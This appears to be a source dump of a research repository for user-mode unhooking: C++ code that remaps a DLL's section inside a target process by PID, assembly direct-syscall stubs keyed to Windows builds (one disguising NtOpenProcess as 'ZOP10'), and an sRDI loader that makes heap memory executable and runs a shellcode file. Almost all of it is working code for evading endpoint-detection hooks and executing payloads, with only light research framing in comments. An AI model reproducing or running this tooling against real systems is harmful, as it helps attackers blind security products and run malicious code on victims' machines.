// INVALID_HANDLE_VALUE expands to ((HANDLE)(LONG_PTR)-1), i.e. the same
// pseudo-handle value the Nt* APIs use for "current process"; the trailing
// comment keeps the literal spelling for reference.
#define NtCurrentProcess() INVALID_HANDLE_VALUE//((HANDLE)(LONG_PTR)-1)

// 1073741827 == 0x40000003, an informational (non-error) status.
#define STATUS_IMAGE_NOT_AT_BASE 1073741827

// NtCreateFile CreateDisposition / CreateOptions bits.
#define FILE_OPEN 0x00000001

#define FILE_NON_DIRECTORY_FILE 0x00000040

#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020

// Struct/Enum definitions
// ------------------------------------------------------------------------

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef const UNICODE_STRING* PCUNICODE_STRING;

typedef struct _PEB_LDR_DATA {
    ULONG Length;
    BOOLEAN Initialized;
    HANDLE SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID EntryInProgress;
    BOOLEAN ShutdownInProgress;
    HANDLE ShutdownThreadId;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

typedef struct _RTL_USER_PROCESS_PARAMETERS {
    BYTE Reserved1[16];
    PVOID Reserved2[10];
    UNICODE_STRING ImagePathName;
    UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;

typedef struct _API_SET_NAMESPACE {
    ULONG Version;
    ULONG Size;
    ULONG Flags;
    ULONG Count;
    ULONG EntryOffset;
    ULONG HashOffset;
    ULONG HashFactor;
} API_SET_NAMESPACE, *PAPI_SET_NAMESPACE;

// Partial PEB
// Field order matters: the assembly stubs in sysc_sw1.asm read the OS
// version straight out of the PEB by offset (OSMajorVersion at +0x118 and
// OSBuildNumber at +0x120 on x64, per the comments in that file). Do not
// add, remove or reorder members before OSBuildNumber without updating
// those offsets. NOTE(review): layout is the Windows 10 x64 one; not
// checked against older releases.
typedef struct _PEB {
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union
    {
        BOOLEAN BitField;
        struct
        {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN IsProtectedProcess : 1;
            BOOLEAN IsLegacyProcess : 1;
            BOOLEAN IsImageDynamicallyRelocated : 1;
            BOOLEAN SkipPatchingUser32Forwarders : 1;
            BOOLEAN SpareBits : 3;
        };
    };
    HANDLE Mutant;

    PVOID ImageBaseAddress;
    PPEB_LDR_DATA Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PRTL_CRITICAL_SECTION FastPebLock;
    PVOID IFEOKey;
    PSLIST_HEADER AtlThunkSListPtr;
    union
    {
        ULONG CrossProcessFlags;
        struct
        {
            ULONG ProcessInJob : 1;
            ULONG ProcessInitializing : 1;
            ULONG ProcessUsingVEH : 1;
            ULONG ProcessUsingVCH : 1;
            ULONG ProcessUsingFTH : 1;
            ULONG ProcessPreviouslyThrottled : 1;
            ULONG ProcessCurrentlyThrottled : 1;
            ULONG ProcessImagesHotPatched : 1;
            ULONG ReservedBits0 : 24;
        };
    };
    union
    {
        PVOID KernelCallbackTable;
        PVOID UserSharedInfoPtr;
    };
    ULONG SystemReserved;
    ULONG AtlThunkSListPtr32;
    PAPI_SET_NAMESPACE ApiSetMap;
    ULONG TlsExpansionCounter;
    PVOID TlsBitmap;
    ULONG TlsBitmapBits[2];
    PVOID ReadOnlySharedMemoryBase;
    PVOID SharedData;
    PVOID *ReadOnlyStaticServerData;
    PVOID AnsiCodePageData;
    PVOID OemCodePageData;
    PVOID UnicodeCaseTableData;
    ULONG NumberOfProcessors;
    ULONG NtGlobalFlag;
    ULARGE_INTEGER CriticalSectionTimeout;
    SIZE_T HeapSegmentReserve;
    SIZE_T HeapSegmentCommit;
    SIZE_T HeapDeCommitTotalFreeThreshold;
    SIZE_T HeapDeCommitFreeBlockThreshold;
    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    PVOID *ProcessHeaps;
    PVOID GdiSharedHandleTable;
    PVOID ProcessStarterHelper;
    ULONG GdiDCAttributeList;
    PRTL_CRITICAL_SECTION LoaderLock;
    // The three version fields below are what the syscall stubs key on.
    ULONG OSMajorVersion;
    ULONG OSMinorVersion;
    USHORT OSBuildNumber;
} PEB, *PPEB;

// TEB with the public (winternl.h-style) opaque layout: only the PEB pointer
// and the TLS slots are named, everything else is reserved padding.
typedef struct _TEB {
    PVOID Reserved1[12];
    PPEB ProcessEnvironmentBlock;
    PVOID Reserved2[399];
    BYTE Reserved3[1952];
    PVOID TlsSlots[64];
    BYTE Reserved4[8];
    PVOID Reserved5[26];
    PVOID ReservedForOle;
    PVOID Reserved6[4];
    PVOID TlsExpansionSlots;
} TEB, *PTEB;

// Object name/attributes block passed to NtCreateFile and friends.
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _IO_STATUS_BLOCK {
    union {
        NTSTATUS Status;
        VOID* Pointer;
    };
    ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;

// InheritDisposition argument of NtMapViewOfSection.
typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT, *PSECTION_INHERIT;
-------------------------------------------------------------------------------- /ShellycoatResearch/Src/dllmain.cpp: --------------------------------------------------------------------------------
#include "Structs.h"
#include "Syscalls.h"
#include "SectionRemap.h"

#include
#include
//#include
//#include

// Call after DLL is loaded
//
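------------------------------------------------------------------------

// Drive the unhooking sequence against process `pid`.
//
// Steps, in order:
//   1. resolve_syscalls()           - populate the direct-syscall stubs
//                                     (declared in Syscalls.h).
//   2. section_remap(pid, dllToFix) - remap `dllToFix` inside `pid`
//                                     (declared in SectionRemap.h; the usage
//                                     text in main() says the name is given
//                                     without the ".dll" suffix).
//
// Returns 0 on success, -1 if the syscalls could not be resolved and -2 if
// the remap failed. The Sleep(50) calls are debug pacing only ("[DEBUG]" in
// the original) and have no functional role.
int go(int pid, std::string dllToFix) {
    // [DEBUG]
    Sleep(50);
    printf("[DBG] Preparing to baptize tainted dll!\n");

    // Resolve the direct syscalls
    Sleep(50);
    if (!resolve_syscalls()) {
        printf("[DBG] Failed to resolve syscalls!\n");
        return -1;
    }
    Sleep(50);
    printf("[DBG] Syscalls resolved!\n");

    // Attempt to perform Section Remapping
    Sleep(50);
    if (!section_remap(pid, dllToFix)) {
        printf("[DBG] Failed to perform Section Remapping!\n");
        return -2;
    }
    Sleep(50);
    printf("[DBG] Section Remapping done!\n");
    return 0;
}

// DllMain
// ------------------------------------------------------------------------
// Despite the file name there is no DllMain: compile64_cli2.bat links this
// file as a console executable (/ENTRY:mainCRTStartup, /OUT:...exe), so
// main() below is the real entry point.
//BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
//void main() {
//	go(10);
//}

// Console entry point: <pid> <dll name without .dll>.
//
// The pid is parsed strictly. atoi() (used previously) returns 0 for any
// non-numeric input and silently ignores trailing characters, so a typo
// such as "abc" or "12a4" would aim the remap at pid 0 or pid 12 without
// any indication; such input is now rejected with an explicit message.
int main(int argc, char *argv[]) {
    if (argc != 3)
    {
        printf("Supply pid and dll filename (without .dll) as argument. \n");
        return -1;
    }

    char *end = NULL;
    long long parsed = strtoll(argv[1], &end, 10);
    // Reject: no digits consumed, trailing junk, non-positive pids, or a
    // value that does not fit the int go()/section_remap() take (strtoll
    // saturates on overflow, which the upper bound also catches).
    if (end == argv[1] || *end != '\0' || parsed <= 0 || parsed > 2147483647LL) {
        printf("Invalid pid: %s\n", argv[1]);
        return -1;
    }
    int pid = (int)parsed;

    std::string dllToFix = argv[2];
    printf("Target pid: %d\n", pid);
    return go(pid, dllToFix);
}
-------------------------------------------------------------------------------- /ShellycoatResearch/Src/stub.binaaa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Src/stub.binaaa -------------------------------------------------------------------------------- /ShellycoatResearch/Src/sysc_sw1.asm: --------------------------------------------------------------------------------
.code

; NtWriteVirtualMemory via a direct syscall (SysWhispers-style stub).
; The system service number (SSN) is chosen from the OS version stored in the
; PEB rather than read from ntdll, so the call still works when
; ntdll!NtWriteVirtualMemory has been hooked in user mode. Arguments follow
; the native x64 convention (rcx, rdx, r8, r9, then the stack); rcx is copied
; to r10 before "syscall" because that instruction overwrites rcx.
; Only the Windows 10 builds listed below are recognised. Any other major
; version or build lands in the _Unknown path, which now fails cleanly.
NtWriteVirtualMemory PROC
    mov rax, gs:[60h]                             ; Load PEB into RAX (TEB+0x60).
NtWriteVirtualMemory_Check_X_X_XXXX:              ; Check major version (PEB+0x118, OSMajorVersion).
    cmp dword ptr [rax+118h], 10
    je NtWriteVirtualMemory_Check_10_0_XXXX
    jmp NtWriteVirtualMemory_SystemCall_Unknown
NtWriteVirtualMemory_Check_10_0_XXXX:             ; Check build number for Windows 10 (PEB+0x120, OSBuildNumber).
    cmp word ptr [rax+120h], 10240
    je NtWriteVirtualMemory_SystemCall_10_0_10240
    cmp word ptr [rax+120h], 10586
    je NtWriteVirtualMemory_SystemCall_10_0_10586
    cmp word ptr [rax+120h], 14393
    je NtWriteVirtualMemory_SystemCall_10_0_14393
    cmp word ptr [rax+120h], 15063
    je NtWriteVirtualMemory_SystemCall_10_0_15063
    cmp word ptr [rax+120h], 16299
    je NtWriteVirtualMemory_SystemCall_10_0_16299
    cmp word ptr [rax+120h], 17134
    je NtWriteVirtualMemory_SystemCall_10_0_17134
    cmp word ptr [rax+120h], 17763
    je NtWriteVirtualMemory_SystemCall_10_0_17763
    cmp word ptr [rax+120h], 18362
    je NtWriteVirtualMemory_SystemCall_10_0_18362
    cmp word ptr [rax+120h], 18363
    je NtWriteVirtualMemory_SystemCall_10_0_18363
    cmp word ptr [rax+120h], 19041
    je NtWriteVirtualMemory_SystemCall_10_0_19041
    cmp word ptr [rax+120h], 19042
    je NtWriteVirtualMemory_SystemCall_10_0_19042
    jmp NtWriteVirtualMemory_SystemCall_Unknown   ; Builds after 20H2 (19043+) are not in this table.
NtWriteVirtualMemory_SystemCall_10_0_10240:       ; Windows 10.0.10240 (1507)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_10586:       ; Windows 10.0.10586 (1511)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_14393:       ; Windows 10.0.14393 (1607)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_15063:       ; Windows 10.0.15063 (1703)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_16299:       ; Windows 10.0.16299 (1709)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_17134:       ; Windows 10.0.17134 (1803)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_17763:       ; Windows 10.0.17763 (1809)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_18362:       ; Windows 10.0.18362 (1903)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_18363:       ; Windows 10.0.18363 (1909)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_19041:       ; Windows 10.0.19041 (2004)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_10_0_19042:       ; Windows 10.0.19042 (20H2)
    mov eax, 003ah
    jmp NtWriteVirtualMemory_Epilogue
NtWriteVirtualMemory_SystemCall_Unknown:          ; Unknown/unsupported version.
    ; This used to be a bare "ret", which handed RAX (still the PEB pointer
    ; loaded above) back to the C caller as the NTSTATUS: whether NT_SUCCESS()
    ; passed depended on the PEB address. Return an explicit error instead so
    ; the unsupported build is detected rather than guessed at.
    mov eax, 0C0000002h                           ; STATUS_NOT_IMPLEMENTED
    ret
NtWriteVirtualMemory_Epilogue:
    mov r10, rcx
    syscall
    ret
NtWriteVirtualMemory ENDP

end
-------------------------------------------------------------------------------- /ShellycoatResearch/Src/sysc_sw1.h: --------------------------------------------------------------------------------
#pragma once

#include

// Prototype of the direct-syscall stub defined in sysc_sw1.asm; the
// signature mirrors ntdll!NtWriteVirtualMemory. On an OS version the stub
// does not know it returns STATUS_NOT_IMPLEMENTED (0xC0000002) without
// issuing a syscall, so callers should test NT_SUCCESS() on the result.
EXTERN_C NTSTATUS NtWriteVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    IN PVOID Buffer,
    IN SIZE_T NumberOfBytesToWrite,
    OUT PSIZE_T NumberOfBytesWritten OPTIONAL);


-------------------------------------------------------------------------------- /ShellycoatResearch/Src/syscalls64.asm: --------------------------------------------------------------------------------
.code

; Reference: https://j00ru.vexillium.org/syscalls/nt/64/

; ---------------------------------------------------------------------
; Windows 7 SP1 / Server 2008 R2 specific syscalls
; ---------------------------------------------------------------------

; NtCreateFile, SSN 0x52 on Windows 7 SP1 / Server 2008 R2.
NtCreateFile7SP1 proc
    mov r10, rcx
    mov eax, 52h
    syscall
    ret
NtCreateFile7SP1 endp
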
; --- Stub shape (identical for every proc in this file) -----------------
;   mov r10, rcx     ; x64 syscall ABI: the kernel takes the first argument in r10
;   mov eax, <SSN>   ; system service number for that Windows release
;   syscall
;   ret
; The SSNs are hard-coded per OS family (suffix 7SP1 / 80 / 81 / 10) from
; the j00ru table referenced at the top of the file. Nothing in this file
; checks the running OS version: the caller has to pick the stub that
; matches it. A wrong pick executes a *different* system call with the same
; arguments - e.g. 0x26 is NtMapViewOfSection on Windows 8 but NtOpenProcess
; on Windows 10 (see ZOP10 below).

; NtCreateSection, SSN 0x47 on Windows 7 SP1 / Server 2008 R2.
NtCreateSection7SP1 proc
    mov r10, rcx
    mov eax, 47h
    syscall
    ret
NtCreateSection7SP1 endp

; NtMapViewOfSection, SSN 0x25 on Windows 7 SP1 / Server 2008 R2.
NtMapViewOfSection7SP1 proc
    mov r10, rcx
    mov eax, 25h
    syscall
    ret
NtMapViewOfSection7SP1 endp

; NtProtectVirtualMemory, SSN 0x4D on Windows 7 SP1 / Server 2008 R2.
NtProtectVirtualMemory7SP1 proc
    mov r10, rcx
    mov eax, 4Dh
    syscall
    ret
NtProtectVirtualMemory7SP1 endp

; NtUnmapViewOfSection, SSN 0x27 on Windows 7 SP1 / Server 2008 R2.
NtUnmapViewOfSection7SP1 proc
    mov r10, rcx
    mov eax, 27h
    syscall
    ret
NtUnmapViewOfSection7SP1 endp

; NtClose, SSN 0x0C on Windows 7 SP1 / Server 2008 R2.
NtClose7SP1 proc
    mov r10, rcx
    mov eax, 0Ch
    syscall
    ret
NtClose7SP1 endp

;----------------------------------------------------------------------
; Windows 8 / Server 2012 specific syscalls
; ---------------------------------------------------------------------

; NtCreateFile, SSN 0x53 on Windows 8 / Server 2012.
NtCreateFile80 proc
    mov r10, rcx
    mov eax, 53h
    syscall
    ret
NtCreateFile80 endp

; NtCreateSection, SSN 0x48 on Windows 8 / Server 2012.
NtCreateSection80 proc
    mov r10, rcx
    mov eax, 48h
    syscall
    ret
NtCreateSection80 endp

; NtMapViewOfSection, SSN 0x26 on Windows 8 / Server 2012.
NtMapViewOfSection80 proc
    mov r10, rcx
    mov eax, 26h
    syscall
    ret
NtMapViewOfSection80 endp

; NtProtectVirtualMemory, SSN 0x4E on Windows 8 / Server 2012.
NtProtectVirtualMemory80 proc
    mov r10, rcx
    mov eax, 4Eh
    syscall
    ret
NtProtectVirtualMemory80 endp

; NtUnmapViewOfSection, SSN 0x28 on Windows 8 / Server 2012.
NtUnmapViewOfSection80 proc
    mov r10, rcx
    mov eax, 28h
    syscall
    ret
NtUnmapViewOfSection80 endp

; NtClose, SSN 0x0D on Windows 8 / Server 2012.
NtClose80 proc
    mov r10, rcx
    mov eax, 0Dh
    syscall
    ret
NtClose80 endp

;----------------------------------------------------------------------
; Windows 8.1 / Server 2012 R2 specific syscalls
; ---------------------------------------------------------------------

; NtCreateFile, SSN 0x54 on Windows 8.1 / Server 2012 R2.
NtCreateFile81 proc
    mov r10, rcx
    mov eax, 54h
    syscall
    ret
NtCreateFile81 endp

; NtCreateSection, SSN 0x49 on Windows 8.1 / Server 2012 R2.
NtCreateSection81 proc
    mov r10, rcx
    mov eax, 49h
    syscall
    ret
NtCreateSection81 endp

; NtMapViewOfSection, SSN 0x27 on Windows 8.1 / Server 2012 R2.
NtMapViewOfSection81 proc
    mov r10, rcx
    mov eax, 27h
    syscall
    ret
NtMapViewOfSection81 endp

; NtProtectVirtualMemory, SSN 0x4F on Windows 8.1 / Server 2012 R2.
NtProtectVirtualMemory81 proc
    mov r10, rcx
    mov eax, 4Fh
    syscall
    ret
NtProtectVirtualMemory81 endp

; NtUnmapViewOfSection, SSN 0x29 on Windows 8.1 / Server 2012 R2.
NtUnmapViewOfSection81 proc
    mov r10, rcx
    mov eax, 29h
    syscall
    ret
NtUnmapViewOfSection81 endp

; NtClose, SSN 0x0E on Windows 8.1 / Server 2012 R2.
NtClose81 proc
    mov r10, rcx
    mov eax, 0Eh
    syscall
    ret
NtClose81 endp

;----------------------------------------------------------------------
; Windows 10 / Server 2016 specific syscalls
; ---------------------------------------------------------------------

; NtCreateFile, SSN 0x55 on Windows 10 / Server 2016.
NtCreateFile10 proc
    mov r10, rcx
    mov eax, 55h
    syscall
    ret
NtCreateFile10 endp

; NtCreateSection, SSN 0x4A on Windows 10 / Server 2016.
NtCreateSection10 proc
    mov r10, rcx
    mov eax, 4Ah
    syscall
    ret
NtCreateSection10 endp

; NtMapViewOfSection, SSN 0x28 on Windows 10 / Server 2016.
NtMapViewOfSection10 proc
    mov r10, rcx
    mov eax, 28h
    syscall
    ret
NtMapViewOfSection10 endp

; NtProtectVirtualMemory, SSN 0x50 on Windows 10 / Server 2016.
NtProtectVirtualMemory10 proc
    mov r10, rcx
    mov eax, 50h
    syscall
    ret
NtProtectVirtualMemory10 endp

; NtUnmapViewOfSection, SSN 0x2A on Windows 10 / Server 2016.
NtUnmapViewOfSection10 proc
    mov r10, rcx
    mov eax, 2Ah
    syscall
    ret
NtUnmapViewOfSection10 endp

; NtClose, SSN 0x0F on Windows 10 / Server 2016.
NtClose10 proc
    mov r10, rcx
    mov eax, 0Fh
    syscall
    ret
NtClose10 endp

; "ZOP10": the name hides what this is. SSN 0x26 is NtOpenProcess on
; Windows 10 in the referenced table (NOTE(review): confirm against the
; caller's argument list); a reader auditing cross-process access will not
; find it by grepping for NtOpenProcess.
ZOP10 proc
    mov r10, rcx
    mov eax, 26h
    syscall
    ret
ZOP10 endp

; ---------------------------------------------------------------------
end
; ---------------------------------------------------------------------
-------------------------------------------------------------------------------- /ShellycoatResearch/Testing/Loader.cpp: --------------------------------------------------------------------------------
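// sRDI Loader
// Credits: Nick Landers(@monoxgas) and SBS Team

#include <windows.h>
#include <cstdio>
#include <cstdlib>

// Read the whole of `filename` into a freshly malloc'd buffer.
//
// On success *data points at the bytes, `size` holds the byte count, the
// buffer carries one extra NUL past `size` (not counted), and a non-zero
// value is returned. On any failure (open, seek/tell, allocation, short
// read) nothing is leaked, *data and `size` are left untouched and 0 is
// returned. The caller owns *data and must free() it.
DWORD GetFileContents(LPCSTR filename, LPSTR *data, DWORD &size) {
    std::FILE *fp = std::fopen(filename, "rb");
    if (!fp) {
        return false;
    }

    // Length via seek/tell. ftell() reports -1L on failure; the original
    // stored that straight into an unsigned DWORD and then malloc'd ~4 GiB.
    if (std::fseek(fp, 0, SEEK_END) != 0) {
        std::fclose(fp);
        return false;
    }
    long length = std::ftell(fp);
    if (length < 0 || std::fseek(fp, 0, SEEK_SET) != 0) {
        std::fclose(fp);
        return false;
    }

    // One extra byte so the buffer can be NUL-terminated; the original
    // allocated size + 1 but never wrote the terminator and never checked
    // for a NULL return.
    LPSTR buffer = (LPSTR)malloc((size_t)length + 1);
    if (!buffer) {
        std::fclose(fp);
        return false;
    }

    // A short read would otherwise leave uninitialised heap bytes that
    // main() goes on to execute as shellcode, so the count is checked.
    if (length > 0 && std::fread(buffer, (size_t)length, 1, fp) != 1) {
        free(buffer);
        std::fclose(fp);
        return false;
    }
    std::fclose(fp);

    buffer[length] = '\0';
    *data = buffer;
    size = (DWORD)length;
    return true;
}

// Entry point of an sRDI blob: called with no arguments, returns the
// loaded module (as an integer) per the sRDI convention.
typedef UINT_PTR(WINAPI * RDI)();

// Test harness: load <file> (an already-converted sRDI blob, not a raw DLL),
// make its first page executable, and jump into it after a key press.
// This is deliberately minimal and only suitable for a lab: it executes an
// arbitrary file from the command line and flips heap memory to RWX.
int main(int argc, char *argv[], char *envp[]) {
    LPSTR finalShellcode = NULL, data = NULL;
    DWORD finalSize = 0, dataSize = 0;
    DWORD dwOldProtect1 = 0;
    SYSTEM_INFO sysInfo;
    (void)envp;

    // For any MessageBox testing in the blob
    HMODULE test = LoadLibraryA("User32.dll");
    (void)test;

    if (argc < 2) {
        printf("\n[!] Usage:\n\n\tNativeLoader.exe \n");
        return 0;
    }

    if (!GetFileContents(argv[1], &data, dataSize)) {
        printf("\n[!] Failed to load file\n");
        return 0;
    }

    // The MZ check below reads two bytes; refuse anything shorter instead of
    // reading past the end of the buffer (an empty file previously got here
    // with an uninitialised 1-byte allocation).
    if (dataSize < 2) {
        printf("\n[!] File is too small to be a shellcode blob\n");
        free(data);
        return 0;
    }

    if (data[0] == 'M' && data[1] == 'Z') {
        printf("[+] File is a DLL, please convert first\n");
        free(data);
        return 0;
    }
    printf("[+] File is a shellcode, attempting to inline execute\n");
    finalShellcode = data;
    finalSize = dataSize;
    (void)finalSize;

    // Wait for user interaction to fire payload
    printf("[!] Press any key to fire payload!\n");
    getchar();

    GetNativeSystemInfo(&sysInfo);

    // Only set the first page to RWX
    // This is should sufficiently cover the sRDI shellcode up top
    // NOTE(review): the blob lives in a malloc'd heap region, so this turns
    // (part of) the heap executable; VirtualProtect rounds the range out to
    // page boundaries, so it covers one page from the rounded-down base and
    // may not reach the whole bootstrap if it straddles a page. Fine for a
    // test loader, not a pattern to copy.
    if (!VirtualProtect(finalShellcode, sysInfo.dwPageSize, PAGE_EXECUTE_READWRITE, &dwOldProtect1)) {
        // Previously a silent exit that also leaked the buffer.
        printf("\n[!] VirtualProtect failed: %lu\n", GetLastError());
        free(finalShellcode);
        return 0;
    }

    RDI rdi = (RDI)(finalShellcode);
    UINT_PTR hLoadedDLL = rdi(); // Execute DLL
    (void)hLoadedDLL;

    free(finalShellcode); // Free the RDI blob. We no longer need it.

    return 0;
}

-------------------------------------------------------------------------------- /ShellycoatResearch/Testing/compile64.bat: --------------------------------------------------------------------------------
@ECHO OFF

rem /GS- drops the stack-cookie checks (and the __security_cookie import) and
rem /MERGE:_RDATA=.text folds read-only data into the code section - presumably
rem so the output converts cleanly to position-independent shellcode. Both are
rem lab-loader conveniences, not settings to carry into a real build.
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /EHsc Loader.cpp /link /OUT:loader.exe /SUBSYSTEM:CONSOLE /RELEASE /MACHINE:x64 /MERGE:_RDATA=.text /EMITPOGOPHASEINFO
del *.obj
-------------------------------------------------------------------------------- /ShellycoatResearch/Testing/edr.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Testing/edr.dll -------------------------------------------------------------------------------- /ShellycoatResearch/compile64_cli2.bat: --------------------------------------------------------------------------------
@ECHO OFF

rem Builds Src\dllmain.cpp as a console EXE (/ENTRY:mainCRTStartup,
rem /OUT:Bin\shellycoat_x64.exe). The shellcode-conversion step below is
rem commented out, so this script does not regenerate Bin\shellycoat_x64.dll
rem or the .bin files; those are checked-in artefacts.
"c:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29910\bin\Hostx86\x64\ml64.exe" /c /Cx Src\\syscalls64.asm
"c:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29910\bin\Hostx86\x64\ml64.exe" /c /Cx Src\\sysc_sw1.asm
cl.exe /nologo /MT /GS- /Od /DNDEBUG /W4 /Tp Src\\dllmain.cpp /link syscalls64.obj sysc_sw1.obj Kernel32.lib ucrt.lib libvcruntime.lib libcmt.lib libcpmt.lib /NODEFAULTLIB /ENTRY:mainCRTStartup /OUT:Bin\\shellycoat_x64.exe /MACHINE:x64 /Brepro /RELEASE /MERGE:_RDATA=.text /EMITPOGOPHASEINFO

rem cd Python & python ConvertToShellcode.py -c -f "" -u "" -i ..\\Bin\shellycoat_x64.dll & cd ..
del dllmain.obj
del syscalls64.obj
del sysc_sw1.obj --------------------------------------------------------------------------------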